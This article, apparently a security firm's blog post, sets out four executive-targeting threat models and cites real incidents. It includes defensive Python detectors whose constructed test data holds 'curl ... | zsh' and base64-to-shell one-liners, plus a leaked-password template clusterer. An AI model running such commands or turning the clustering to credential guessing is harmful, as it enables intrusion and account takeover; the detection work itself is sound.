In February 2024, a finance employee at the Hong Kong office of British engineering firm Arup joined a video call with people he believed were his CFO and several colleagues. He had received an email earlier requesting a confidential transaction, and the email had looked suspicious. The video call appeared to confirm everything. The voices were familiar. The faces were familiar. He authorised fifteen wire transfers in a single day, totalling HK$200 million, about $25.6 million. None of the people on the call were real. The CFO and the colleagues were deepfake reconstructions. None of the funds have been recovered.
What product was that company supposed to have bought?
"Executive cybersecurity" is sold as three different things by three different industries. Physical-security firms sell it as a digital extension of close-protection work. Enterprise cybersecurity vendors sell it as their existing platform with extra MFA on the CEO's laptop. Privacy-services firms sell it as personal IT support for VIPs: monitoring tools, broker scans, dark-web alerts. None of these three would have prevented what happened to Arup.
The reason is structural. Most "executive cybersecurity" buyers are choosing between products on a single axis: how thoroughly they monitor the executive's own accounts. But the attacks that have hurt executives in 2024 to 2026, the named ones in the news and the ones documented by Google's Threat Intelligence Group and Mandiant across a series of detailed reports, do not target the executive's accounts at all. They target the people, systems and identities adjacent to the executive. The executive's name, voice, image, role and career profile are the lock-pick. The executive's accounts are the trophy, not the door.
This piece walks through four distinct threat models that get conflated under "executive cybersecurity," with the attacks that prove each one, and an analytical view of what investigation-led work does that product monitoring categorically cannot.
Four threat models, distinguished by where the executive sits
The taxonomy that matters is not the sophistication of the attacker. It is where the executive sits in the attack chain, and who the human target of the social engineering is.
Model 1: the executive is incidental
The largest category by volume. Commodity attacks (phishing campaigns sent to millions, infostealer malware seeded through cracked software downloads, automated credential-stuffing) catch the executive in the same net as everyone else. The executive's corporate credential ends up in a broker dump or a stealer log because their personal device was infected, because they reused a password, because a third-party site they used was breached.
This is the model "executive cybersecurity" products are best at addressing. Continuous credential monitoring, password-manager enforcement, training against MFA push fatigue: all reasonable controls against an opportunistic threat. We covered the operational mechanics of this layer in how infostealers work in 2026.
This article's argument is not that this model is unimportant. It is that buyers stop here, treating opportunistic credential hygiene as the whole problem. Three further models are where the damage has actually landed.
Model 2: the executive is the path, directly targeted
Here the executive themselves is the human target of the social engineering. Their identity is the entry vector into the corporation.
In mid-May 2025, Trellix detected a spear-phishing campaign aimed at CFOs and financial executives at banks, energy companies, insurers and investment firms across Europe, Africa, Canada, the Middle East and South Asia. The phishing email impersonated a recruiter from Rothschild & Co., offering a "strategic opportunity." The lure was a PDF link routed through a Firebase-hosted URL. A VBScript fetched a payload renamed trm.zip, which contained two installers: NetBird (a legitimate remote-access tool) and OpenSSH. The intrusion created a hidden local account, enabled remote desktop access, and persisted NetBird through scheduled tasks. NetBird itself confirmed that 197 machines had been registered to the single malicious account before it was disabled.
The recruiter pretext only works because CFO career profiles are publicly readable. LinkedIn, executive-search-firm databases, financial press coverage of the executive's company, conference speaker bios: all combine into a profile that makes a Rothschild & Co. recruiter outreach plausible enough to click. We covered the corporate version of this surface in identity attack surface: what ASM vendors miss.
When this type of compromise lands, the consequences are not bounded by what the threat actor steals on day one. The Office of the Special Deputy Receiver, an Illinois non-profit that administers estates of insolvent insurance companies, lost approximately $6.85 million in 2021 after a hacker compromised the CFO's Outlook account and posed as him in emails directing wire transfers to staff. Eight transfers went out before the fraud was caught. The agency turned to its insurers. Hartford denied coverage. So did HSB Specialty.
In March 2025, the Northern District of Illinois ruled on the dispute. Office of the Special Deputy Receiver v. Hartford Fire Insurance Co., 2025 U.S. Dist. LEXIS 60484 (N.D. Ill. Mar. 31, 2025). The court granted Hartford's motion to dismiss on the grounds that an Electronic Mail Initiated Transfer Fraud Coverage exclusion (Rider 17) "unambiguously applied" to losses where the insured had transferred funds in good-faith reliance on a fraudulent email instruction. Coverage barred. The court denied HSB Specialty's motion on a separate Computer Fraud provision, leaving that question for trial, but HSB Specialty had also already disclosed a $250,000 sublimit on its Social Engineering provision, a fraction of the $6.85 million loss.
The reading: even when the consequence is unambiguously corporate financial loss, the path to it routinely runs through the executive's account. And the insurance market is increasingly excluding this category of loss from coverage. The product that pays out when the compromised executive's email costs the company millions may not exist anymore. That is a board-level fact and not one most "executive cybersecurity" buyers have factored.
Model 3: the executive is the personal target
In this model the executive personally bears the damage: financial theft from the executive's holdings, extortion, doxxing, family threats, deepfake-driven personal attacks. What changes is that the entry vector often runs through a vendor or service provider, not the executive's accounts.
In May 2025, Coinbase disclosed in an SEC Form 8-K filing that cybercriminals had bribed overseas customer-support contractors to extract internal customer data, including names, email addresses, phone numbers, partially masked Social Security and bank account numbers, government-issued identity document images, and account activity history. Less than 1% of Coinbase's monthly transacting users were affected. On May 11, the attackers demanded a $20 million ransom in Bitcoin. On May 15, CEO Brian Armstrong publicly refused, and Coinbase offered a $20 million bounty for information leading to the attackers' arrest. Coinbase's SEC filing estimated remediation and customer-reimbursement costs at $180 million to $400 million. In December 2025, Bloomberg reported that a former agent had been arrested in India.
The structural point is not that Coinbase failed to protect its data, though that is also true. The structural point is that the executives holding crypto on Coinbase had no involvement in the compromise. Their own accounts and devices were untouched. The bribed insider extracted enough data (a real name, a partial bank number, an ID document image, account activity) to support directly targeted social engineering against those executive customers. A doxxing attempt. A SIM-swap setup. A confidence call. A phishing email referencing recent legitimate transactions. The executive's monitoring tool, if they had one, would have shown nothing wrong.
This is the model in which the executive's posture toward their service providers is itself part of their threat surface: what jurisdictions hold their data, what custody arrangements expose them to insider risk, what cross-correlations a single vendor breach unlocks. We covered the underlying principle in the mosaic effect.
Model 4: the executive is the vector, used to attack adjacent humans
The largest category by damage in 2024 to 2026. The executive's identity, voice, image, role and relationships are used as pretexting fuel to socially engineer people around them: help desk staff, finance employees, vendor employees, family members. The executive's own accounts are often not the entry vector or the trophy. They are the lock-pick.
The pattern is now two and a half years old at scale. In September 2023, Scattered Spider used a LinkedIn-sourced employee identity to make a ten-minute phone call to MGM Resorts' IT help desk. The call yielded administrative access to MGM's Okta and Azure environments. The attack cost MGM approximately $100 million in third-quarter results, ten days of operational disruption, and ultimately a $45 million class-action settlement in January 2025.
In April 2025, the same playbook landed at Marks & Spencer. The attackers (Scattered Spider again, deploying DragonForce ransomware) first compromised Tata Consultancy Services, the outsourced contractor that ran M&S's IT help desk. M&S warned investors that the incident would shave roughly £300 million off its annual profit. Across the broader UK retail wave that spring, which also caught Co-op and Harrods, total damages have been reported between £270 million and £440 million.
Nineteen months between MGM and M&S. The same playbook. The same verification gap. The gap closed nowhere.
In January 2026, Google's Threat Intelligence Group documented the evolution of this pattern. GTIG tracked three threat clusters, UNC6661, UNC6671 and UNC6240, running a sophisticated variant. Attackers called employees pretending to be IT staff, directed them to lookalike SSO portals (<companyname>sso.com, my<companyname>internal.com, <companyname>okta.com), harvested credentials and MFA codes in real time, then registered their own device for MFA on the compromised account. To cover tracks, they enabled a legitimate Google Workspace add-on called ToogleBox Recall and permanently deleted the Okta "Security method enrolled" notification email, so that the employee would not see that a new device had been registered to their account. In at least one case, the threat actors then used the newly compromised email to send phishing emails to that employee's contacts at cryptocurrency-focused companies, deleting the outbound emails afterwards.
Mandiant's own framing of this activity: "This activity is not the result of a security vulnerability in vendors' products or infrastructure. Instead, it continues to highlight the effectiveness of social engineering."
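The three lookalike hostnames GTIG lists above share one shape: the target's brand fused with an identity-provider word. The following detector is an added example, not code from GTIG, Mandiant or this page. It generalises the three documented shapes (`<brand>sso.com`, `my<brand>internal.com`, `<brand>okta.com`) to a short list of IdP tokens and optional prefixes, and runs over a constructed list of newly observed hostnames of the kind a certificate-transparency or passive-DNS feed yields. The token list, the prefix list, the fictional brand and the hostnames are all assumptions.

```python
"""Triage newly observed hostnames for forged SSO-portal lookalikes.

Added example, not code from GTIG, Mandiant or the page. It generalises the
three lookalike shapes the report names (<brand>sso.com,
my<brand>internal.com, <brand>okta.com) to a short list of identity-provider
tokens and optional prefixes. The token list, the prefix list and the observed
hostnames below are assumptions / constructed input, not real observations.
"""
import re

IDP_TOKENS = ("sso", "okta", "internal", "login", "auth", "mfa", "duo", "vpn", "helpdesk")
PREFIXES = ("my", "secure", "portal")

# After the brand is removed from the registrable label, what is left must be an
# optional prefix followed by one or more IdP tokens, with optional hyphens:
# "sso", "myinternal", "okta", "-sso-login" all match; "" and "foods" do not.
_REMAINDER = re.compile(
    r"^-?(?:%s)?(?:-?(?:%s))+-?$" % ("|".join(PREFIXES), "|".join(IDP_TOKENS))
)

def split_host(hostname):
    """Return (subdomain labels, registrable label, tld). Naive: treats the last
    label as the public suffix, so 'co.uk'-style suffixes are an assumption
    this example does not handle."""
    parts = hostname.lower().strip(".").split(".")
    if len(parts) < 2:
        raise ValueError(f"not a fully qualified hostname: {hostname!r}")
    return parts[:-2], parts[-2], parts[-1]

def lookalike_reason(brand, hostname, legit_domains):
    """Explain why hostname resembles a forged identity portal for brand,
    or return None when it is allow-listed or unrelated."""
    host = hostname.lower().strip(".")
    for legit in legit_domains:
        if host == legit or host.endswith("." + legit):
            return None
    subs, label, tld = split_host(host)
    b = brand.lower()
    if b in label:
        remainder = label.replace(b, "", 1)
        if _REMAINDER.match(remainder):
            return f"brand fused with identity-portal token in registrable label {label}.{tld}"
    # Brand pushed into a subdomain of an attacker domain that is itself IdP-themed.
    if any(b in s for s in subs) and any(t in label for t in IDP_TOKENS):
        return f"brand appears as subdomain of unrelated identity-themed domain {label}.{tld}"
    return None

def triage(brand, hostnames, legit_domains):
    """Map each flagged hostname to its reason; unflagged hosts are omitted."""
    return {h: r for h in hostnames if (r := lookalike_reason(brand, h, legit_domains))}

# Constructed allow-list and feed for a fictional brand; none are real observations.
LEGIT_DOMAINS = frozenset({"contoso.com", "contoso.okta.com"})
OBSERVED = [
    "contososso.com",             # <brand>sso.com
    "mycontosointernal.com",      # my<brand>internal.com
    "contosookta.com",            # <brand>okta.com
    "news.contoso-sso-login.net", # hyphenated, multiple tokens
    "contoso.okta-verify.net",    # brand as subdomain of IdP-themed domain
    "sso.contoso.com",            # legitimate, under the allow-listed apex
    "contoso.okta.com",           # legitimate tenant
    "contosofoods.com",           # unrelated brand collision
]

if __name__ == "__main__":
    for host, reason in triage("contoso", OBSERVED, LEGIT_DOMAINS).items():
        print(f"{host:28} {reason}")
```

The allow-list check runs first so that the real Okta tenant and the company's own subdomains never surface as findings; everything else is judged on shape alone, which is the point: the GTIG clusters needed no typo-squat or homoglyph, only a plausible word next to the brand.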
One of the three clusters GTIG named, UNC6671, operated under the BlackFile brand between February and May 2026, targeting "dozens of organizations" across North America, Australia and the UK. Two operational details from Mandiant's May 2026 publication are worth holding onto. First: UNC6671 targeted employees' personal cellular phones, calling personal mobile numbers obtained through reconnaissance, to bypass corporate phone-system monitoring entirely. Second: extortion escalation included threatening voicemails to C-suite executives and swatting tactics against company personnel, a physical-safety threat that corporate cybersecurity tooling does not address. In one case, a single victim's SharePoint and OneDrive environments yielded over a million individual files exfiltrated.
The ecosystem in which all this sits is fragmented and fluid. Europol's 2026 Internet Organised Crime Threat Assessment recorded more than 120 active ransomware brands in 2025, with significant administrator and affiliate overlap across brands. IOCTA also records that in May 2025 ShinyHunters tricked Salesforce customers into authorising a malicious application against their organisations' portals and exfiltrated over one billion customer records in total. In August 2025, the Scattered LAPSUS$ Hunters alliance was announced: a coalition between Scattered Spider, ShinyHunters and LAPSUS$, three groups already responsible for a documented thread of help-desk vishing, SIM-swapping, insider recruitment and social engineering against major technology, healthcare and retail companies. The brands are short-lived. The technique is not.
What monitoring sees versus what investigation finds
Most "executive cybersecurity" products are monitoring tools. They produce alerts when data appears in places it should not: a broker listing, a breach corpus, a dark-web channel, a leaked credential dump. This is useful for Model 1, the opportunistic category. It is structurally limited against the other three.
The limit shows up as four pairings. In each, monitoring sees the artifact. Investigation sees what the artifact enables.
Monitoring sees a people-search profile showing the executive's home address. Investigation sees the home address joined to the spouse's social-media check-ins, the children's school district from a yearbook PDF, the housekeeping service whose website lists the executive among its clients, and the property-tax records confirming the same residence. It recognises that this composite is sufficient to plan a physical visit or to construct a vishing pretext referencing a specific delivery the executive is expecting.
Monitoring sees a credential leak showing an executive's old password from a 2019 breach. Investigation sees that the same email was used to register an obscure conference forum where the executive disclosed which password manager they use, that the password follows a personal-template pattern reused with one-character variations across four other services in different leaks, and that two of those four services protect cryptocurrency wallets.
Monitoring sees a LinkedIn job-change. Investigation sees that the job-change opens a recruiter-pretexting window with predictable timing, that the executive's transition narrative makes a Rothschild & Co. "strategic opportunity" plausible for the next ninety days, and that the new corporate email format is now publicly inferrable from LinkedIn.
Monitoring sees a public conference photo. Investigation sees the executive's facial geometry now available in sufficient resolution for image-based tools, their voice from the recorded panel, the family pattern from the audience-shot they were tagged in, and the office layout visible through the window of a separate event photo.
Each pairing makes one point. The artifact is not the threat. The threat is what the artifact enables when joined to the other six things an investigator would find in ninety minutes. Monitoring categorically cannot do this joining work because the tools are not configured to. They are configured to alert on the artifact, not to interrogate its meaning.
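The credential pairing above, a template reused with one-character variations across several leaks, is mechanical enough to show in code. The following is an added example, not code from this page or from any investigation tooling it names; the leak records are constructed and contain no real credentials, and the "high-value" tag on two services is an assumed label. It goes slightly beyond the single-character case: two passwords are treated as siblings of one template when they are within one edit of each other, or when they share the same character shape and the same alphabetic skeleton (so `Summer2019!` and `Summer2021!` cluster together even though they differ in two positions).

```python
"""Cluster leaked passwords for one identity into reused personal templates.

Added example, not the page's code and not any tooling the page names. The
leak records below are constructed and contain no real credentials. Two
passwords are siblings when they differ by at most one edit (Levenshtein
distance <= 1) or share the same character shape and alphabetic skeleton
(Summer2019! and Summer2021! both have shape Xxxxxx####! and skeleton
'summer'). HIGH_VALUE is an assumed label on the breached services.
"""
from collections import defaultdict
from itertools import combinations

LEAKS = [  # constructed: (source breach, email, password, year first seen)
    ("conf-forum-2019", "j.doe@example.com", "Summer2019!", 2019),
    ("retailer-2021",   "j.doe@example.com", "Summer2021!", 2021),
    ("crypto-wallet-a", "j.doe@example.com", "Summer2021?", 2022),
    ("crypto-wallet-b", "j.doe@example.com", "summer2021!", 2023),
    ("gaming-2020",     "j.doe@example.com", "Tr0ub4dor&3", 2020),
    ("retailer-2021",   "other@example.com", "Summer2021!", 2021),
]
HIGH_VALUE = frozenset({"crypto-wallet-a", "crypto-wallet-b"})

def levenshtein(a, b):
    """Edit distance by the standard two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def shape(pw):
    """Mask a password to character classes: X upper, x lower, # digit, ! other."""
    out = []
    for c in pw:
        if c.isdigit():
            out.append("#")
        elif c.isalpha():
            out.append("X" if c.isupper() else "x")
        else:
            out.append("!")
    return "".join(out)

def skeleton(pw):
    """Letters only, lower-cased: the memorable word the template is built on."""
    return "".join(c.lower() for c in pw if c.isalpha())

def siblings(p, q, max_edits=1):
    """True when p and q plausibly derive from the same personal template."""
    if levenshtein(p, q) <= max_edits:
        return True
    return shape(p) == shape(q) and skeleton(p) == skeleton(q)

def cluster_templates(leaks, high_value):
    """Per email, group passwords into template clusters of size >= 2 and note
    whether any member of the cluster protects a high-value service."""
    by_email = defaultdict(list)
    for source, email, pw, year in leaks:
        by_email[email].append((source, pw, year))
    report = {}
    for email, recs in by_email.items():
        parent = list(range(len(recs)))  # union-find over record indices
        def find(i):
            while parent[i] != i:
                parent[i] = parent[parent[i]]
                i = parent[i]
            return i
        for i, j in combinations(range(len(recs)), 2):
            if siblings(recs[i][1], recs[j][1]):
                parent[find(i)] = find(j)
        groups = defaultdict(list)
        for i, rec in enumerate(recs):
            groups[find(i)].append(rec)
        clusters = []
        for members in groups.values():
            if len(members) < 2:
                continue
            sources = {s for s, _, _ in members}
            years = [y for _, _, y in members]
            clusters.append({
                "sources": sorted(sources),
                "passwords": sorted(pw for _, pw, _ in members),
                "years": (min(years), max(years)),
                "high_value_exposed": sorted(sources & high_value),
            })
        if clusters:
            report[email] = clusters
    return report

if __name__ == "__main__":
    for email, clusters in cluster_templates(LEAKS, HIGH_VALUE).items():
        for c in clusters:
            print(email, c["years"], c["sources"], "high-value:", c["high_value_exposed"])
```

Run against the constructed records, the 2019 forum password, two retail and wallet variants, and a lower-cased fourth copy all fall into one cluster spanning 2019 to 2023, and both wallet services are listed as exposed; the unrelated `Tr0ub4dor&3` stays out. That joined view is what a raw credential-leak alert on the 2019 password does not give you.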
The corporate and personal seam
The CISO of any well-run company has dashboards on the executive's corporate identity surface: corporate laptop, corporate email, SSO logs, EDR telemetry, anomaly detection on privileged accounts. The CISO has no visibility into the executive's personal mobile number, home router, family devices, personal email accounts, breach corpora carrying the executive's personal data, broker records, public-registry filings, conference photos with EXIF metadata, the personal social media of the executive's spouse or adult children.
The executive is the highest-value individual target the CISO is responsible for protecting, and the one the CISO has the least visibility into.
The seam is bidirectional. Work-life events feed personal-side phishing pretexts: a quarterly results announcement creates a window for a fake-recruiter approach; an M&A disclosure creates a window for spear-phishing the executive's personal accounts. Personal-life events feed corporate-side social engineering: a divorce filing creates a vishing pretext; kids' Instagram geotags inform residential-threat planning; a vacation Instagram post creates a "boss is unreachable" BEC window during which a forged email request to staff is most plausible.
The BlackFile detail of attackers calling executives' personal mobile numbers is the seam in its purest form. Corporate phone-system controls (call recording, anomaly detection, blocked-number lists, MDM enforcement on corporate devices) have no application to a call placed to the executive's personal mobile.
The bidirectional pivot mechanics, how work-life events become personal-side phishing pretexts and how personal-life events become corporate-side social engineering, deserve their own treatment, and we will cover them in a dedicated piece. The point for now is that the seam exists, that it cannot be defended from one side, and that asking the CISO's team to defend it is asking them to do work they are structurally unequipped to do. The personal-corporate seam should be a separate remit, with its own posture, its own tooling, and its own analyst capacity.
What practitioner-led work actually does
Three concrete things, distinct from product monitoring.
Adversarial mapping of the public identity surface. The work an investigator would do in the first ninety minutes if the executive were the target. Identity-graph construction across data-broker records, breach corpora, registries, social-media footprint, photo and voice exposure, family and household linkages, vendor and service-provider relationships. The point is not to alert when something new appears. The point is to produce the document a directed adversary would produce, and then reduce it. We covered the principles in what does the internet know about you and the corporate analogue in identity attack surface: what ASM vendors miss.
Cross-correlation across exposure layers. The mosaic the threat actor builds is the threat. Single artifacts are not. The investigation work that produces value is the layer-joining work: address, spouse, school, travel, vendor, breach. A monitoring tool that alerts on the address does not produce the layer-joined view. An analyst constructing the view does. We covered the principle in the mosaic effect.
Active reduction with verification and re-emergence checks. Removal submissions tracked across categories, suppression-record discipline under Article 17(3)(b) of the GDPR, retroactive re-checks after re-emergence, escalation paths when a controller does not comply within the statutory window. This is methodological work, not a feature of a monitoring tool. We covered the mechanics for the credential layer in how a Lockdown investigation runs and the methodology for the people-search layer in how a Mirror investigation runs.
The four PI Solutions services map to four entry points into this work. The Mirror produces the adversarial map at a fixed scope in 48 hours: a snapshot of what an investigator finds across the public identity surface. The Lockdown investigates the credential and leak layer when there is reason to think a specific account or identity has been compromised or is being actively targeted. The Shield is for executives with active, named threats (stalking, targeted impersonation campaigns, ransom approaches against personal holdings) where ongoing protective work is needed. The Corporate Audit addresses the organisation-level version of the same problem, including the personnel-exposure layer that NIS2 requires regulated entities to assess and third-party risk including the supplier organisations whose compromise becomes the executive's compromise. We covered the regulatory framing in digital exposure as an NIS2 risk vector.
What is not on offer here is a SaaS product that "monitors" the executive. That model addresses Model 1 and does not address Models 2, 3 or 4. The work that does address them is investigative, analyst-led, and the same shape across organisations: map the surface, join the layers, reduce what can be reduced, watch what cannot, prepare for the call that comes anyway.
The cost of category error
The costs of the named incidents in this piece, collected in one place:
- Arup deepfake (Model 4): $25.6 million in fraudulent wire transfers, none recovered.
- Trellix CFO recruiter campaign (Model 2): 197 machines compromised on a single malicious NetBird account; total downstream loss not publicly disclosed.
- Illinois OSDR (Model 2): $6.85 million in fraudulent transfers, $2.87 million recovered; insurance coverage denied under an Electronic Mail Initiated Transfer Fraud exclusion in March 2025.
- Coinbase (Model 3): $180 million to $400 million estimated remediation and customer reimbursement per SEC filing; $20 million ransom refused, $20 million bounty offered.
- MGM Resorts (Model 4 baseline): $100 million Q3 hit, $45 million class-action settlement.
- M&S (Model 4 evolution): £300 million annual profit hit; broader UK retail wave £270 million to £440 million.
- BlackFile UNC6671 (Model 4 current): over a million files exfiltrated from a single victim's SharePoint and OneDrive; total wave damages not yet aggregated.
Each of these costs traces to a category error. The product the company bought addressed a different threat model from the one that hit them. The defensive purchase passed an internal procurement check. The buyer was not unsophisticated. The category itself is broken.
When the threat actor is state-level
The four threat models hold across attacker sophistication. State-aligned adversaries do not occupy a fifth model; they operate within all four with greater patience, more resources, and fewer constraints on collateral damage.
In February 2026, Google's Threat Intelligence Group published an investigation of UNC1069, a financially motivated threat actor that GTIG assesses with high confidence has a North Korea nexus and that Mandiant has tracked since 2018. In a recent intrusion documented in the report, UNC1069 first compromised the Telegram account of a cryptocurrency company executive. That compromised account became the wedge. The threat actor used it to engage a second target, building rapport over Telegram and then sending a Calendly link to schedule a thirty-minute meeting.
The meeting routed to fake Zoom infrastructure (zoom.uswe05.us) hosted on attacker-controlled servers. During the call, the victim was shown a video of a CEO from another cryptocurrency company. A fake audio issue was used to redirect the victim to a "troubleshooting" web page that displayed plausible-looking diagnostic commands (system_profiler SPAudioData, softwareupdate --evaluate-products) with a malicious curl | zsh one-liner embedded among them. The victim executed the commands. Seven distinct malware families were deployed in the single intrusion, configured to harvest Keychain credentials, browser cookies and login data across Chrome, Brave and Edge, Telegram session data, and Apple Notes content from the compromised host.
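The "troubleshooting" page works because the harmless commands lend credibility to the one that is not. On the endpoint, though, the sequence is distinctive: diagnostics from a terminal, then a downloader piped straight into an interpreter. The detector below is an added example, not code from GTIG or Mandiant and not part of the page. It runs over constructed process-execution records (the URL uses the reserved `.invalid` suffix; nothing here is a real observation), keys on the shape of the command rather than on any indicator, and raises severity when the same user and terminal ran one of the diagnostic commands the page names shortly before. The 120-second window and the command lists are assumptions.

```python
"""Flag pipe-to-interpreter executions and the diagnostics-then-payload sequence.

Added example, not code from GTIG or Mandiant and not part of the page. EVENTS
is constructed process-execution telemetry, not real data; the URL is a
reserved .invalid name. The detector keys on the command's shape (a downloader
or decoder piped into a shell) and escalates when a plausible diagnostic
command from the same user and tty preceded it. The 120-second window, the
interpreter list and the diagnostic list are assumptions.
"""
import re
from datetime import datetime, timedelta

DOWNLOADERS = r"(?:curl|wget|fetch)"
INTERPRETERS = r"(?:zsh|bash|sh|ksh|dash|python3?|perl|osascript)"
PIPE_TO_SHELL = re.compile(rf"\b{DOWNLOADERS}\b[^|;&]*\|\s*(?:sudo\s+)?{INTERPRETERS}\b")
DECODE_TO_SHELL = re.compile(rf"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?{INTERPRETERS}\b")
# Commands a lure page would show to look like genuine macOS troubleshooting.
DIAGNOSTIC_LURE = re.compile(r"^\s*(?:system_profiler|softwareupdate|sw_vers|ioreg|diskutil)\b")

EVENTS = [  # constructed: (ISO timestamp, user, tty, command line)
    ("2026-02-09T14:02:11", "alice", "ttys003", "system_profiler SPAudioData"),
    ("2026-02-09T14:02:30", "alice", "ttys003", "softwareupdate --evaluate-products"),
    ("2026-02-09T14:02:41", "alice", "ttys003", "curl -fsSL https://example.invalid/audiofix | zsh"),
    ("2026-02-09T14:10:00", "bob",   "ttys001", "curl -sS https://example.invalid/r.json -o /tmp/r.json"),
    ("2026-02-09T14:11:00", "bob",   "ttys001", "echo aGVsbG8= | base64 -D | sh"),
    ("2026-02-09T15:00:00", "carol", "ttys002", "brew install jq"),
]

def detect(events, window_seconds=120):
    """Return a finding for every pipe-to-shell or decode-to-shell command.
    Severity is 'critical' when a diagnostic-looking command from the same
    user and tty preceded it within the window, otherwise 'high'."""
    recent_diag = {}  # (user, tty) -> timestamp of the last diagnostic-looking command
    findings = []
    for ts_text, user, tty, cmd in sorted(events):
        ts = datetime.fromisoformat(ts_text)
        key = (user, tty)
        if DIAGNOSTIC_LURE.match(cmd):
            recent_diag[key] = ts
            continue
        if PIPE_TO_SHELL.search(cmd):
            reason = "downloader piped into interpreter"
        elif DECODE_TO_SHELL.search(cmd):
            reason = "base64 decode piped into interpreter"
        else:
            continue  # a plain download to disk, or an unrelated command
        last = recent_diag.get(key)
        if last is not None and ts - last <= timedelta(seconds=window_seconds):
            severity = "critical"
            reason += f"; preceded by diagnostic command {int((ts - last).total_seconds())}s earlier"
        else:
            severity = "high"
        findings.append({"time": ts_text, "user": user, "tty": tty,
                         "severity": severity, "reason": reason, "command": cmd})
    return findings

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"[{f['severity']:8}] {f['user']}@{f['tty']} {f['time']}  {f['reason']}")
```

On the constructed telemetry, alice's `curl | zsh` eleven seconds after `softwareupdate` is reported as critical, bob's decode-to-shell as high, and bob's ordinary `curl -o` download is not reported at all. Keying on the pipe rather than the hostname is deliberate: the fake Zoom domain changes per campaign, the shape of the one-liner does not.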
GTIG's November 2025 publication on AI in threat-actor tradecraft recorded UNC1069's transition from "using AI for simple productivity gains to deploying novel AI-enabled lures in active operations." Kaspersky has reported overlap with a related DPRK-nexus actor, Bluenoroff, in using GPT-4o for image modification. The point is not that AI is now the threat. The point is that AI is now operational across the threat-actor stack, which means the cost of producing convincing pretexting material (a recruiter email, a brand-matched landing page, a colleague's voice on a phone call) has fallen.
Mandiant's framing of the UNC1069 intrusion is the closing argument of this article: "a targeted attack to harvest as much data as possible for a dual purpose; enabling cryptocurrency theft and fueling future social engineering campaigns by leveraging victim's identity and data."
The compromised executive's identity becomes the wedge into the next executive. The next executive's harvested data becomes the input to the next campaign. The cycle is operational across financially motivated criminal groups, state-aligned threat actors, and the tooling both have at their disposal. Buying a monitoring product to alert on artifact appearances does not interrupt this cycle.
Closing
Cybersecurity for executives is not a product category. It is an investigation discipline. The four threat models in this piece are not exotic. They are documented in the threat-intelligence reports of Mandiant, Google's Threat Intelligence Group, Trellix, Europol, and in the federal courts of the United States across the last twenty-four months. The pattern across them is consistent. The executive's name, voice, image, role, career profile, relationships and adjacent identities are the attack surface. The executive's own accounts are the trophy.
Sources
Threat intelligence reports
- Google Threat Intelligence Group — "Tracking the Expansion of ShinyHunters-Branded SaaS Data Theft" (UNC6661, UNC6671, UNC6240; January 30, 2026)
- Google Threat Intelligence Group — "Inside the BlackFile Vishing Extortion Operation" (UNC6671; May 15, 2026)
- Google Threat Intelligence Group — UNC6692 'Snow Flurries' campaign analysis (April 23, 2026)
- Google Threat Intelligence Group — UNC1069 cryptocurrency-sector intrusion analysis (February 9, 2026)
- Trellix Research — "A Flyby on the CFO's Inbox: Spear-Phishing Campaign Targeting Financial Executives with NetBird Deployment" (June 2025)
- Europol — Internet Organised Crime Threat Assessment (IOCTA) 2026 (Scattered LAPSUS$ Hunters alliance August 2025; ShinyHunters Salesforce data theft May 2025; ransomware-brand fragmentation analysis)
Named incidents (press and primary sources)
- Fortune — "A deepfake 'CFO' tricked British design firm Arup in $25 million fraud"
- CNN Business — "Arup revealed as victim of $25 million deepfake scam involving Hong Kong employee"
- World Economic Forum — "Cybercrime: Lessons learned from a $25m deepfake attack"
- Coinbase — "Protecting Our Customers — Standing Up to Extortionists" (May 15, 2025; references SEC Form 8-K filing same date)
- CNBC — "Coinbase says hackers bribed staff to steal customer data and are demanding $20 million ransom"
- Bloomberg — "Coinbase Says Former Agent Arrested in India After Exchange Hack"
- BleepingComputer — "MGM Resorts ransomware attack led to $100 million loss, data theft"
- The Hacker News — "Scattered Spider Behind Cyberattacks on M&S and Co-op, Causing Up to $592M in Damages"
- Infosecurity Magazine — "Inside DragonForce, the Group Tied to M&S, Co-op and Harrods Hacks"
- Daily Security Review — "Scattered Spider Breached M&S via Third-Party TCS Credentials, Sources Confirm"
Legal
- Office of the Special Deputy Receiver v. Hartford Fire Insurance Co., 2025 U.S. Dist. LEXIS 60484 (N.D. Ill. Mar. 31, 2025). Simpson Thacher case alert summarising the court's holdings on the Electronic Mail Initiated Transfer Fraud exclusion (Rider 17) and the Computer Fraud / Social Engineering coverage dispute under separate carrier policies.